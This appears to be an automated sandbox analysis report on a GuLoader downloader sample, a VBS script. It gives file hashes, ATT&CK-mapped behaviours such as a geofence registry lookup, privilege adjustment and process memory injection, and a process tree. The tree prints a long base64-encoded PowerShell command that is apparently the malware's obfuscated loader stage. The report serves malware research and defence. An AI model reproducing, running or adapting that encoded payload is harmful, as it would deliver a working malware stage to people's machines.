guloader | 5768e1954e0e2e8d32dd31c7c312efa3bfc42fa9ea63101e9de35fe209278370

General

Target

115020077.vbs
Size

209KB
MD5

5beada8c6a728d89cf91a3e9e0e6fa72
SHA1

fab160d62c7a2ab3efd7ccd4e3bdaa0cd72ee2c5
SHA256

5768e1954e0e2e8d32dd31c7c312efa3bfc42fa9ea63101e9de35fe209278370
SHA512

d0d1b08f9b54a049a7adf122c2e6bd772c9f8cd52c8f504a13cbc126564f2c39d8a808633b69dc4da2146c371f7543b9abd3aea13a4d9deac555a7c5c71a61f9
SSDEEP

6144:8os1wpBZZcm+ZOKMj5TdY1B9O8owYXKKlF:5soPc9OZTdYP9ByT

Score

10^/10

guloader downloader

Malware Config

Signatures

Guloader,Cloudeye
A shellcode based downloader first seen in 2020.
downloader guloader

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Control Panel\International\Geo\Nation	WScript.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Suspicious behavior: EnumeratesProcesses 2 IoCs

pid	Process
3808	powershell.exe
3808	powershell.exe

Suspicious use of AdjustPrivilegeToken 1 IoCs

description	pid	Process
Token: SeDebugPrivilege	3808	powershell.exe

Suspicious use of WriteProcessMemory 9 IoCs

description	pid	Process	procid_target
PID 4972 wrote to memory of 3808	4972	WScript.exe	86
PID 4972 wrote to memory of 3808	4972	WScript.exe	86
PID 4972 wrote to memory of 3808	4972	WScript.exe	86
PID 3808 wrote to memory of 4220	3808	powershell.exe	88
PID 3808 wrote to memory of 4220	3808	powershell.exe	88
PID 3808 wrote to memory of 4220	3808	powershell.exe	88
PID 4220 wrote to memory of 1912	4220	csc.exe	89
PID 4220 wrote to memory of 1912	4220	csc.exe	89
PID 4220 wrote to memory of 1912	4220	csc.exe	89

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\115020077.vbs"
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:4972
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "JABQAGwAdQBrAGsAZQB0AHMAIAA9ACAAQAAnAA0ACgBhAGgAbwByAG4AQQBGAHUAbgBuAGUAZABMAGcAbgBlAHIAZABFAGoAZQByAGsALQBJAG4AdABlAHIAVABFAHIAbgByAGkAeQBIAGUAbgBzAHQAcABKAHUAbgBpAHMAZQBiAGQAawBlAHIAIABUAGEAbgBkAGUALQBGAGwAbABlAHMAVABFAHAAaQBnAHIAeQBOAG8AbgBnAGwAcABNAGUAZABhAG4AZQBzAGsAaQBuAGsARABNAGEAcwBrAGkAZQBCAHUAbABsAGQAZgBQAGQAYQBnAG8AaQBOAGUAdABzAHQAbgBVAGQAbQBhAGwAaQBVAGQAZgByAGQAdABGAGkAbABtAG4AaQBCAHIAbgBlAHAAbwBEAGEAYQBoAGkAbgBTAGsAeQB0AHQAIABTAGUAbgBnAGUAQABGAGEAcgByAGEAIgAKAEEAbgByAGUAdAB1AFQAaABlAGEAdABzAFUAbgBjAG8AbgBpAEsAbAB1AG0AcABuAFYAaQBsAGQAcwBnAEIAdQBuAG4AaQAgAFMAbABrAGsAZQBTAFUAbAB0AGsAbgB5AGQAZQBsAGkAcgBzAEsAbABrAHMAcwB0AEQAZQBwAGkAbABlAEMAbwB3AG0AZQBtAFMAZQByAGkAcAA7AAoARwBhAGwAcwBrAHUATABlAHUAYwBvAHMAQgBlAGEAcwB0AGkAQgBvAGIAcwBwAG4AQgBpAGwAYQB0AGcAVgBlAGoAbABlACAARABnAG0AbwBiAFMAUAByAGUAaQBuAHkAVQBuAGwAaQBtAHMATQBpAHMAcwB1AHQAVQBlAHIAcwB0AGUAUwB0AHkAcgB0AG0ATQB1AHIAdABoAC4AUwB2AHIAdgBnAFIAQgB5AHQAdABlAHUATABlAHYAZQByAG4ARwByAHUAZgBmAHQASQBjAG8AbgBvAGkAUwBrAHYAdQBsAG0AUwB3AGEAcgB0AGUAUwBtAGEAYQB0AC4AUwBhAG0AbQBlAEkAUwBwAHUAdAB1AG4ATQBpAGMAcgBvAHQAdQBzAGsAeQBsAGUAUwBhAGIAYQBrAHIAVABpAGwAbAByAG8AZABlAGMAYQBzAHAAVQBuAGQAZQByAFMARABlAHIAbQBvAGUAUwBwAGkAbABkAHIATAB5AG0AZgBlAHYARgByAGUAawB2AGkARAB2AHMAdAB1AGMAQQBtAG4AaQBuAGUASgBhAGwAbwB1AHMAQgBlAHMAawBlADsACgBSAHkAZwBzAGsAcABUAGkAbQBlAGIAdQBWAGkAdABpAGwAYgBHAHIAYQBlAGsAbABTAG0AYQBkAGQAaQBTAGUAbABlAG4AYwBGAG8AcgB0AG8AIABQAGgAYQBsAGEAcwBCAGEAZwBzAGQAdABUAHUAYgB1AGwAYQBBAG4AdABhAHIAdABTAGEAbABwAHMAaQBTAHQAcgBhAGYAYwBTAGEAawBrAGUAIABUAGkAbQBvAHIAYwBTAHQAcgBrAG4AbABQAHIAbwBnAHIAYQBKAGEAcgBnAG8AcwBVAG4AaQBnAGUAcwBQAGUAYwB0AGkAIABNAGEAZAByAGUATwBFAHUAZgBvAHIAdgBTAGgAYQBrAGUAZQBUAHIAaQBzAHQAcgBUAG0AbgBpAG4AcABHAGwAZABzAGIAcgBMAGkAdgByAGUAaQBuAGEAdAB0AGUAYwBHAGEAcwB0AHIAaQBwAHUAbgBrAGEAMQAKAEQAZQB0AHIAYQB7AHQAcgBpAHQAZQBbAFMAawB5AGwAZABEAEEAbgBnAHUAbABsAFUAZABsAHMAdABsAFAAYQBuAHQAbwBJAEwAdQBuAGQAZQBtAEMAaABpAGcAZQBwAEwAaQB0AGgAbwBvAFAAcgBlAGYAbAByAFcAaQBuAGcAYgB0AE8AcABlAHIAYQAoAEQAaQBmAGYAZQAiAEQAYQBuAGsAcgBnAE0AaQBjAHIAbwBkAHMAYQBsAGkAZgBpAFQAaAB5AHIAbwAzAEEAcgBiAGUAagAyAGgAdQBuAG4AaQAiAEgAbwBsAGUAcwApAE0AZQBrAGgAaQBdAFUAbgBjAGgAYQBwAEwAbABlAHMAYwB1AEEAbgBhAGwAeQBiAFMAbABlAHkAcwBsAFAAcgBvAHAAbwBpAEIAYQBnAGEAdABjAFQAbwByAG4AeQAgAEoAYQB3AHMAbQBzAFIAYQBpAG4AbAB0AEMAZQBuAHQAcgBhAEUAdgBhAGwAdQB0AFMAZQByAHYAaQBpAEMAbwBnAGkAdABjAEQAaQBzAGUAbgAgAE8AdgBlAHIAYwBlAFAAbwBzAHQAZQB4AFMAdAB2AHIAZQB0AFQAYQBsAGEAcABlAEYAbwByAHQAdgByAFMAdABlAGwAZwBuAEIAcgB5AHMAdAAgAFMAawByAGEAYQBpAE0AYQBtAG0AZQBuAEYAbwByAGIAYQB0AEIAdQBkAHMAcwAgAFQAYQByAGkAZgBHAEkAbgB0AHUAbQBlAGEAcgBvAG4AcwB0AEIAZQBoAG8AdgBQAEYAbABpAG4AdABhAEMAaQBzAHMAbwB0AEEAeQBsAG0AYQBoAEsAdQByAHMAdQAoAGsAbgBhAGwAZABpAFYAYQByAGUAaQBuAE0AZQBzAG8AdAB0AEwAZQBqAG4AaQAgAGQAaQBkAGEAYwBPAFUAbgByAGUAbAB2AFQAbwBwAGsAYQBlAEcAcgBhAG4AZAAxAGEAcABvAGwAbAA0AEQAaQBzAHEAdQA4AGEAYwBxAHUAZQAsAFUAbgByAHUAZgBpAEYAeQByAGkAbgBuAFQAYQBuAG4AaQB0AEIAZQBzAGsAbgAgAEgAZQByAGwAcwBVAFAAZQByAHMAZQBuAEMAbABpAG4AdABmAFQAcgB5AGsAawAsAEsAcgBvAG8AcABpAFMAdABvAGsAYQBuAGQAaQBzAHAAdQB0AE8AdgBlAHIAagAgAEQAdQBiAG8AbgBGAFMAcABlAGMAaQB1AEEAbQBtAG8AbgBjAEUAbABlAHYAZQBhAFMAdABuAG4AZQB0AE8AYgBqAHUAcgBpAEQAaQBzAHAAYQAxAFAAdQBuAGcAaQAxAEUAbQBpAGcAcgAxAEQAYQBtAHAAbQAsAFUAbgBsAGEAZABpAEMAYQBuAGMAZQBuAFYAYQByAG0AdAB0AEwAYQBkAGEAawAgAFIAaQBzAGkAawBzAGIAZQBmAGEAdABrAEcAaQBhAG4AdAByAEEAcwBzAGEAcwBhAFMAeQBuAGQAZQApAEcAZQBuAGUAcgA7AAoAUgBvAHQAdQBuAFsATQBvAG4AbwBjAEQARABqAHYAZQBsAGwAcwBvAG4AaQBjAGwAQwBvAGwAZQBvAEkATwByAGsAaQBkAG0AVABpAHAAcABlAHAASwBvAG4AcwB1AG8AUgBpAGwAbABlAHIAYgB5AGwAZABlAHQATwBtAHIAYQBhACgAVAB1AGIAZQByACIAbgBhAHYAbABlAGsAQwBhAHIAbgBpAGUAVQBuAGMAbwBuAHIAUABlAG4AZABlAG4AVQBuAGMAbwBuAGUAVAByAHIAZQBwAGwATwB2AGUAcgB3ADMAVQBuAHMAbQBpADIAVAByAGkAdgBpACIATABvAG4AZwBvACkASABlAHIAbgBlAF0AUgBlAHQAYQBiAHAAVQBuAHYAaQB2AHUAQQBiAHMAaQBuAGIAVABvAHAAaABlAGwAUgBvAGIAYgBpAGkAQgBvAGcAawBsAGMAQgBqAGUAcgBnACAAcABhAHMAawB1AHMARQBuAHMAcABvAHQATwB1AHQAcAB1AGEAQwBlAG4AdAByAHQAUwBjAHUAdAB1AGkASABhAG4AZABlAGMAdABpAGwAYgBhACAAUABoAGEAcgB5AGUAUQB1AGEAZAByAHgAQQByAGsAZQByAHQARgBpAGEAcwBrAGUAUAB1AG0AYQBlAHIAUAB1AG0AcABkAG4AUwBjAHIAZQBlACAATwB2AGUAcgB0AGkAVQBuAGQAZQByAG4ARwBhAGIAYgBpAHQAZQB4AG8AYwBvACAAVAByAHMAdABlAFMARwByAGkAcABoAGUARwBlAG4AZQByAHQARABvAGcAbABwAFUATABvAHIAZQBuAG4AcwBuAGUAawBhAGgATAB1AGEAdQBnAGEAQwBvAHIAbwBuAG4AQgBvAG4AaQB0AGQAQgBlAG0AZQBlAGwASQBzAGMAaABpAGUASwBsAGEAdgByAGQARQBrAHMAZQBtAEUARQBzAGMAaABhAHgARwBhAGwAbABhAGMAUwB3AGUAZQB0AGUATwB1AHQAYQBnAHAARgBpAGwAbQB1AHQARABlAGoAcwBlAGkAQwB1AGIAaQBjAG8ARQBzAHQAaQBtAG4ARABpAHMAYwBvAEYAVgBlAHMAdAByAGkASQBuAGgAYQBsAGwAQQBtAG8AcgB0AHQASABqAGUAbQBtAGUAQwBpAHQAcgBvAHIAQwBsAGEAdABoACgATABhAG4AZABlAGkARABvAHQAdABsAG4ATwB2AGUAcgByAHQATgBvAHIAZQBuACAAUABsAGEAZABzAEcAYQByAG0AYQB0AG8ARwBlAG4AbwBwAGIAUABlAHIAYgBvAGwASABlAHQAcwB5AGkAVAByAGkAbgBmAG4ARABlAGQAaQBrACkASwBsAGEAZwBlADsACgBHAGEAbQBtAGEAWwBCAGEAbABrAGkARABDAGEAdQBsAG8AbABFAG0AYgByAG8AbABNAGUAbgBpAGcASQBQAHIAbABhAHQAbQBCAG8AbwBrAGIAcABvAHAAYgB1AGQAbwBXAGkAbgBuAGQAcgBGAG8AcgB0AHIAdABmAG8AcgB1AGQAKABBAG0AcABoAGkAIgBEAGkAcwBjAGkAdQBHAHUAaQB0AGEAcwBQAGwAZQBhAHMAZQBUAGEAYgBsAGUAcgBNAGEAcwBzAGEAMwBUAGUAcgBtAGkAMgByAG8AYwBrAGIAIgBrAHUAbABsAGUAKQBsAGUAZABlAGIAXQBPAHUAdABkAGEAcABPAHYAZQByAHMAdQBGAHUAbgBrAHQAYgBUAHUAbQBsAGkAbABkAGkAcwBzAG8AaQBUAHIAaQBiAHUAYwBQAGwAYQB0AHkAIABEAG8AcgBzAG8AcwBTAGUAbABlAG4AdABGAGwAYQB0AGwAYQBTAGEAcgBjAGEAdABNAGUAcwB0AHIAaQBLAGEAYgBlAGwAYwBQAGgAaQBsAG8AIABBAG4AbQBvAGQAZQBQAGEAdgBpAHMAeABkAGUAbQBhAHMAdABCAHkAZwBnAGUAZQBLAGEAbABpAG0AcgBNAHUAbQBtAGUAbgBVAG4AdABvAG4AIABUAGkAYgBlAHIAaQBBAG4AdABhAHAAbgBIAHkAcABlAHIAdABJAG4AcAB1AHQAIABDAG8AbgBuAGEASQBNAG8AbgBvAHQAcwBCAGUAcgBlAGcARABIAHUAcwBzAHQAaQBCAGEAbABsAGUAYQBFAHQAYQBhAHIAbABQAGUAZABkAGUAbwBDAGUAcwB0AG8AZwByAGEAYQBzAHQATQBSAGUAbgBzAGsAZQBjAGgAbwBrAGUAcwBNAG8AbABzAGMAcwBXAGEAbgB0AG8AYQBDAG8AcgByAGkAZwBLAG8AbQBwAGwAZQBLAG8AbQBtAGEAKABEAGkAdgBvAHIAaQBSAHUAYgBpAG4AbgBCAG8AZwBrAGEAdABQAHMAeQBrAG8AIABOAG8AdwBlAGQAVQBEAGUAbABzAHQAbgBTAHkAbgBhAHAAcABPAHAAcwBwAGEAZQBPAHYAZQByAHQALABzAHQAbwB3AHMAaQBPAHYAZQByAHMAbgBzAGUAcgBpAG8AdABDAG8AbgBzAHQAIABGAHkAcgByAGUARgBQAGgAbwBjAGEAaQBBAGYAdgBlAGoAbABWAGkAbgB0AGUAaQBBAGwAdQBtAGkAZwBCAGUAZwBtAGEAKQBMAHIAZQBhAG4AOwAKAEYAdQBnAHQAaQBbAFMAdABuAGQAZQBEAEIAcgBuAGUAZgBsAFYAYQBuAGQAcABsAGwAbwByAGQAbABJAE8AdgBlAHIAbQBtAGwAbwBnAHIAZQBwAEMAbwByAGEAbABvAFMAeQBnAGUAaAByAEIAZQBzAHAAbgB0AFAAZQByAG0AaQAoAEIAaQBvAHQAZQAiAEEAbgBlAHQAYQBnAFQAYQBqAGcAYQBkAFMAdQBiAHQAYQBpAEIAYQBuAGEAbgAzAFMAYQB0AGUAbAAyAEcAYQB0AGUAYQAiAEEAcABvAHQAZQApAGUAdABoAHkAbABdAFUAcwBoAGUAcgBwAE0AeQB0AGgAbwB1AEwAbwBmAHQAbABiAFAAZQByAHYAZQBsAFMAdQByAHQAZQBpAFIAbwBvAHMAdABjAFMAawB5AGcAZwAgAFMAYQBnAG4AbwBzAEMAaABlAGUAcgB0AG4AZQBkAGsAbQBhAFcAbwBuAHQAbAB0AEQAYQBhAGIAcwBpAFMAZQBqAGwAYgBjAEIAZQBsAGwAeQAgAFQAYQByAGkAZgBlAEcAaQB2AGUAZgB4AHQAZQB0AHIAYQB0AGsAbABnAGwAYQBlAFMAdABlAHIAcwByAHUAbgBwAGEAdABuAEYAYQBuAHQAYQAgAEQAaQBrAHQAZQBpAEcAYQBzAG8AZwBuAEwAcgBkAG8AbQB0AFIAYQBrAGsAZQAgAFMAdwBhAG4AcwBDAFIAZQBwAG8AcwByAFMAYQBiAGIAYQBlAGQAZQB2AGUAbABhAEEAYwBoAGkAbAB0AEcAZQBuAGUAcgBlAFYAYQBuAGQAZgBFAEQAYQBjAHIAeQBuAFIAaQBmAGEAcgBoAEwAZQByAGoAbwBNAEMAZQBuAHQAcgBlAEYAYQBpAGwAYQB0AGEAdQB0AG8AbQBhAEEAdQB0AG8AbQBGAEYAcgBlAGsAdgBpAFMAdQBwAGUAcgBsAEEAdAB0AGEAYwBlAFQAaQBwAGwAbwAoAEIAZQB0AG4AawBpAEIAbwBiAGEAZABuAEQAcgBlAGoAZQB0AEgAbwBtAG8AZQAgAEYAdQBsAGQAcwBDAEsAbwB0AG8AYQBsAFMAcABpAHIAaQBlAFQAaABlAG8AcABvAFMAawBpAGIAcwAsAEEAcgBpAHoAbwBpAE0AYQByAGMAaABuAFYAcgBnAGUAbAB0AEIAcgB1AGQAZQAgAEkAbgBjAGkAcgBCAFMAeQBuAGEAbgBvAE8AYgBlAHIAcwBuAFMAdQBrAGsAYQB2AHIAZQB1AHQAaQBpAFQAbwBkAGQAeQAxAEcAcgBhAGMAZQA0AEUAcQB1AGkAdgA2AEYAdQBsAGQAZgAsAEIAZQBzAHQAaQBpAFQAcgBhAGIAZQBuAEcAaQBhAHIAcgB0AFMAZQBtAGEAbgAgAE0AYQBjAHIAbwBWAEsAYQByAGcAYQBhAEYAYQBrAHQAdQBuAEIAYQByAGUAbgBwAFoAeQBnAG8AbQBvAFIAeQBuAGsAZQBvAFMAYQBtAHMAZQAsAFMAdABvAGkAcwBpAGIAaQBvAGcAZQBuAFQAZQBlAHQAbwB0AFUAbgBkAGUAcgAgAEkAbABsAG8AcgBTAFUAcgBvAGgAcgBwAEMAbwBhAGwAaQBpAEQAYQBhAHIAbABuAFEAdQBhAGQAcgBkAFQAaQBnAGUAbAApAGsAaQByAG8AcAA7AAoAQQByAGIAZQBqAFsAZgByAGUAcwBjAEQATQBvAGIAaQBsAGwARAB5AGsAcwB2AGwARAB1AHYAZQB0AEkASgBlAHIAbgBnAG0ATQBlAHMAcwBpAHAATABhAHUAbgBjAG8AQQBpAG8AbABpAHIAcwBlAHIAcgBhAHQARgBlAHYAZQByACgASwBvAHIAcwBvACIARgByAGkAbQBuAGwAYgBvAHIAZwBlAHoARgBhAGcAawBvADMAUAByAGUAdABoADIAQwByAGEAZABsAC4AVwBlAHIAbgBlAGQAVABpAHIAYQBpAGwAQgBoAGEAbgBkAGwAUwB1AHIAZwBpACIASwBhAHQAaABsACkAQQB0AHQAYQBjAF0AQgBvAHIAZQBhAHAARwBlAHIAYQBlAHUAQgBlAGEAawBlAGIARABlAGMAcgBlAGwAUgBlAHQAcgBvAGkAVQBkAGQAYQB0AGMAUwBlAGsAcwB0ACAAQwBvAG0AcAB1AHMARABtAG4AaQBuAHQAUgBlAHMAbwBuAGEAQQBmAHMAcABlAHQAQgBpAGwAdAByAGkATQBhAGEAbgBlAGMAVwBlAGUAdwBlACAAQQBuAGEAbgBkAGUAQgBlAGQAaQBuAHgATQB5AGwAZAByAHQAVAByAGEAbgBzAGUAQQByAGIAZQBqAHIARABvAHIAeQBwAG4AVAByAGYAcgBpACAAUwB0AGEAdABpAGkAZQBqAG4AbwBzAG4AUwB0AGEAbgBmAHQAUABvAGwAeQBwACAARAByAGkAawBuAEcASABqAGUAbQBnAGUATAB1AHMAawBlAHQARQBzAGMAdQBsAEUAQgBlAHIAYQBpAHgARgBvAHIAZQByAHAAUABoAGEAcgB5AGEAQQBzAHkAbQBwAG4AVQBuAGYAbAB1AGQAUwBrAGkAbgBnAGUASAB5AHAAbwB0AGQAUABhAGwAZQBvAE4ARQB4AGMAaQBkAGEARgBhAHIAdgBlAG0AYQBtAGIAdQBsAGUASwB1AGcAbABlACgAQgBpAG8AZgBsAGkARABhAHYAaQBkAG4AaABqAHQAaQBkAHQAcwBrAHIAdQBwACAAdQBkAHAAZQBiAEEAQgBlAGIAbwBlAGMASQBuAGQAdAByAGEASgBvAHIAZABmAGQAUwBsAHkAbgBnACwATQBpAHIAdABoAGkARQByAGEAZABpAG4AUAB1AHIAaQB0AHQARwBhAHkAYwBhACAARwBhAG4AZwBuAFAAaQBsAGwAdQBzAHkAcwB1AGYAZgBlAG8ARQByAGkAZwBsAG4ARQBrAHMAcAByACkATABvAHYAcAByADsACgBVAG4AbQBpAHQAWwBDAGEAbgBkAHkARABDAGwAYQBwAGIAbABQAGUAcgBvAGIAbABGAGkAbABtAGIASQBTAGcAZQB0AGkAbQBBAHMAcwBlAG0AcABVAG4AYwByAHkAbwBEAGEAdABhAGkAcgBBAHIAbQBlAHIAdABTAGgAaQBwAHAAKABCAGgAYQBrAHQAIgBlAGEAcwB0AHcAZwBQAGUAcwBzAHUAZABSAGUAdAByAG8AaQBtAGUAZAB1AHMAMwBEAGUAcgB2AGkAMgBOAHkAYgByAHUAIgBJAG4AdABlAHIAKQBCAG8AcgB0AGUAXQBTAHAAZQBnAGUAcABJAG4AZABkAGEAdQBXAHIAYQBpAHQAYgBBAG0AcABoAGkAbABVAGwAZAB0AHIAaQBBAGwAdABpAHMAYwBJAGQAZQBvAGwAIABVAGwAdQBsAGEAcwBTAHUAYgB0AHIAdAB0AG8AawBhAHkAYQBTAGIAeQBlAHIAdABoAGsAYgByAHQAaQBHAGwAbwByAGkAYwBHAHIAYQBtAG0AIABBAG4AcABhAHIAZQBTAHQAbwBwAHAAeABNAG8AcgBnAGUAdABGAG8AcgBwAGwAZQBGAG8AcgBnAGwAcgBSAGUAcwBpAG4AbgBjAGEAdgBlAG0AIABTAGsAbwBzAGUAaQBTAHQAdQBkAGUAbgBBAHQAbwBtAHMAdABBAGYAcABhAHIAIABPAHYAZQByAHMAUgBTAG8AdQB2AGUAZQBVAG4AYwBvAG4AYwBBAGIAcwBlAG4AdABGAGwAdQBvAHIAVgBSAHkAZwBtAGEAaQBDAGwAaQBtAGEAcwBVAGwAcgBpAGsAaQBLAHUAbgBkAGUAYgBEAGUAYwBpAG0AbABSAGEAZABpAG8AZQBOAGUAZwBsAGkAKABJAG4AdABlAHgAaQBTAHQAYQB0AHUAbgBWAG8AbABvAG4AdABTAGEAbABnAHMAIABTAHQAYQB1AG4AYQBZAGEAZwB1AGEAbQBiAHUAcgBsAGUAYgBMAGUAdgBuAGUAZQBEAGUAcABoAGEALABQAGUAcgBsAGkAaQBQAGwAdQB2AGkAbgBTAGMAbwByAGIAdABwAHIAbwBjAGUAIABSAGEAbgBnAGkAUABQAHIAaQBkAGUAYQBBAHUAdABvAG4AcgBKAG8AZwBlAGQAKQBPAGQAaQB1AG0AOwAKAE8AeABpAGQAYQBbAGEAZgBoAG4AZABEAEEAbABsAG8AcABsAFYAZQBnAGUAdABsAEQAcgBlAHAAYQBJAFIAZQB0AHMAZgBtAEoAbwB1AHIAbgBwAG4AZQBkAGQAeQBvAFYAZQBqAHIAdAByAFMAYQBuAHoAZQB0AEgAeQBwAG8AYwAoAEMAZQBjAGkAbAAiAFUAbgBkAGUAcgBrAE8AbABpAHMAawBlAE4AeQBzAHQAaQByAFIAbwB1AHQAaABuAEEAawBhAG4AawBlAFMAbwBnAGQAaQBsAEEAcgB0AGkAcwAzAFcAaQB2AGUAcgAyAFMAdABlAG4AZQAiAEQAbwBsAG8AbQApAFIAZQBqAG4AaABdAFQAbwBwAHMAZQBwAEgAZQBtAHAAcwB1AGUAZABkAG8AZQBiAEkAbgB2AG8AbABsAFAAbABhAGkAZABpAEcAbwBsAHUAcABjAE4AbwBuAGQAaQAgAFUAbgBwAG8AcwBzAE8AZABkAGUAcgB0AEYAbwByAG0AYQBhAEIAbAB1AHQAdwB0AFAAcgBlAHMAcwBpAEIAcgBhAG4AZABjAGwAYQBwAGEAcgAgAEQAZQBzAHAAZQBlAFQAaQB0AHQAZQB4AFUAZABnAHIAYQB0AFUAbgBtAG8AZABlAFYAdQBsAGsAYQByAEEAbQBpAG4AbwBuAEIAdgBlAHIAbAAgAE0AaQBzAGUAcgBJAFIAeQBzAHQAZQBuAFMAbwBkAGEAawB0AEEAbgBzAHQAbgBQAEwAcwBuAGUAcwB0AFMAeQBtAGYAbwByAEEAcwBpAGEAdAAgAFAAYQBwAGUAZwBFAE0AbwByAGEAcgBuAFMAbABvAGQAZwB1AFQAbwByAHQAbwBtAFoAbwBuAGUAdABTAFQAcgBlAHMAcwB5AEYAcgBhAGcAaQBzAEMAYQBmAGUAYgB0AEIAcgBzAHQAbgBlAFUAZAB2AGEAbgBtAFUAdABpAGwAaQBMAFIAZQB3AGkAcwBvAE0AZQBwAGEAYwBjAEIAeQBnAG4AaQBhAEMAaABpAHMAZQBsAGEAZAByAGUAbgBlAEIAdQBuAGMAaABzAFMAdAB5AHIAawBBAEEAcgBiAGUAagAoAEEAZgB0AGEAZwB1AFcAaABlAHkAZQBpAEIAYQBnAG4AZQBuAFUAbgBzAHUAcAB0AEMAYQBjAGgAdQAgAHIAbwB1AGcAaAB2AFMAcABkAGwAZQAxAGMAYQB0AG8AYwAsAFUAbgBpAHYAZQBpAEEAcgB0AGUAcgBuAFAAdQB0AHQAeQB0AE0AbwB6AHoAZQAgAGcAZQBuAGkAbgB2AEEAZgBpAGMAaQAyAEYAcgBpAGsAdgApAFUAcABhAHIAdAA7AAoAUwB0AGUAbQBwAFsAQwBhAG4AdABhAEQAUABvAGwAbAB1AGwAWQBlAHMAdABlAGwAVABoAHkAcwBlAEkAQgBsAG8AdAB0AG0AUgBlAGEAbABpAHAAUAByAHQAZQBuAG8AbwBtAHMAYQBkAHIAUgBlAGMAeQBjAHQAVABhAGwAZQByACgARwBvAG4AZQBkACIAVQBuAGQAZQByAHcATgBnAGwAZQBsAGkAdABhAGIAdQBsAG4ARgBpAHoAZQBsAG0AUgBhAG4AZwBsAG0AUABlAHIAZgBlAC4AawBhAGwAaQBmAGQARgByAGkAegBlAGwAUgBpAGcAaAB0AGwATwB4AGkAZABlACIARgByAGkAdAB6ACkAVgBhAHIAdABhAF0AQwBhAG4AYwBlAHAASQBuAGQAbwBtAHUAVQBkAGwAZQBqAGIAUwB1AHAAZQByAGwAaABqAHIAZQBzAGkAQwByAGUAcABlAGMAUwBsAGEAbQBiACAATwBuAGUAdABpAHMAVQByAGgAbgBzAHQAUwB1AHAAZQByAGEAVAByAGEAYwBoAHQAUwB0AHYAYgBvAGkARgBvAHIAbwBtAGMARgBsAGUAcgBiACAASwBvAG4AdAByAGUARgB1AHQAdQByAHgAQgBpAG4AbwBtAHQAVwBlAGIAZQBsAGUAUwBlAG4AcwBpAHIAQwB5AGEAbgB1AG4AZwBlAHMAaQB0ACAAUAB1AGcAZQByAGkARQBwAGgAZQBiAG4ARABlAHIAbgBlAHQARgBqAGUAcgBwACAARQBnAG0AdQBuAHcATwB2AGUAcgB3AGEAVABoAGUAZgB0AHYATwB2AGUAcgBlAGUAUgByAHMAYQBuAEkAUwB0AGUAbQBtAG4AQQBwAG8AbABvAFUATABhAG4AdABoAG4ASQBuAHYAZQBuAHAAVABlAGcAbgBmAHIAUwBpAGsAcwB0AGUARwBsAHkAYwB5AHAAZQBsAGwAaQBuAGEASQBuAGQAbABzAHIAVAByAGwAawB2AGUAcAByAG8AagBlAEgAcwBrAGkAbAB0AGUAUwBpAGsAawBlAGEAQwBvAG0AYQBrAGQAdABvAGwAZAB2AGUAUgBlAHAAbABhAHIARABpAHMAcgBlACgAVgBlAGoAbQBhAGkAQwByAGkAcwBzAG4ARABlAHYAbwBpAHQAQQBuAHQAaQB6ACAATgB1AG0AZQByAEEAUwBvAGwAZABpAGkAQgBlAHYAZwBlAHIAbwBtAHYAaQBzAGMASQBuAGQAYgBlAHIAUwBrAG8AbABlAGEAUwB1AGwAcABoACwARwByAGEAbgBhAGkARgBvAG8AbABlAG4AQgBlAGQAYQBhAHQAUwB5AG0AcAB0ACAAUgBlAGcAaQBvAEYATQB5AHQAaABpAG8AVQBkAGIAdQBsAHIAVAByAGUAcwBrAHUATwBiAG8AbABmAHIAUQB1AGkAbgB0ACwARABlAGwAZQBsAGkAVgBpAHQAZQByAG4ARQBiAG8AZQBmAHQAVQBuAGQAZQByACAARAB2AHIAZwB0AEoAVABlAHAAaAByAGUASQBuAGUAeABwAHIATgBhAHQAaQBvACkATABpAGcAZQBzADsACgBMAGEAeQBtAGUAWwBtAGUAdABjAGEARABGAG8AcgBnAHIAbABNAGEAbABsAGkAbABCAGEAbABzAGEASQBSAGQAbQBvAHMAbQBNAGoAZABlAHQAcABUAHUAcgBuAG0AbwBMAGEAcwB0AGIAcgBoAG8AcwBwAGkAdABCAGoAZQByAGcAKABCAG8AbwBlAGQAIgBUAG8AbQB0AGkAZwBDAGUAbABhAG4AZABKAG8AZQBuAGYAaQBWAGkAZABlAHIAMwBDAHUAcgBiAHQAMgBUAGEAcgBtAGUAIgBDAGEAbQBwAGkAKQBKAHUAbABlAHMAXQBVAG4AZABlAHIAcABGAHIAYQB2AHIAdQBWAGEAbgBkAGwAYgBBAG0AbQBvAG4AbABSAGEAYQBzAHQAaQBTAGMAcgBlAHcAYwBJAG4AZABlAGsAIABBAHAAcABlAG4AcwBDAGkAbgBlAGMAdABmAHIAYQBuAGsAYQBSAGUAbABlAGcAdABaAGkAbgBjAG8AaQBVAG4AdAByAHUAYwBkAGkAcwBtAGEAIABFAGwAZQBtAGUAZQBXAGEAdQBmAGkAeABWAGEAdAB0AGUAdABVAG4AaQBuAHMAZQBTAGUAZABpAG0AcgBQAHIAbwBmAGEAbgBlAHIAeQB0AGgAIABIAGUAawBzAGUAaQBCAGwAYQBkAGUAbgBSAGgAaQBuAG8AdABMAHAAbABhAG4AIABBAHIAcgBlAGEATABhAG0AbQBpAGMAaQBzAHkAbQBtAGUAbgBNAGEAbgB0AHUAZQBQAGgAbwB0AG8AVABFAG4AdABlAHIAbwBNAGkAZAB0AGUAKABTAHQAYQBtAHAAaQBBAG4AbgBpAGgAbgBWAGEAaABpAG4AdABCAGEAbgBhAGwAIABLAG4AYQBsAGwAUwBUAHUAcgBiAGkAaABpAHIAcgBhAHQAaQBNAHIAawBlAHIAcABGAG8AcgBkAHUAcABNAGkAbABsAGkALABFAHMAcAByAGkAaQBDAG8AbQBwAGwAbgBTAG0AaQBuAGsAdABEAGsAZgBhAHIAIABTAGMAcwBpAHUAYwBCAHMAcwBlAG4AaABLAGEAbAB2AHMAYQB0AHUAdAB0AGkAdABQAHIAZQByAGUAdABDAGgAbABvAHIAYQBBAGMAZQByAGIALABDAHkAcAByAGkAaQBDAGEAbgBuAG8A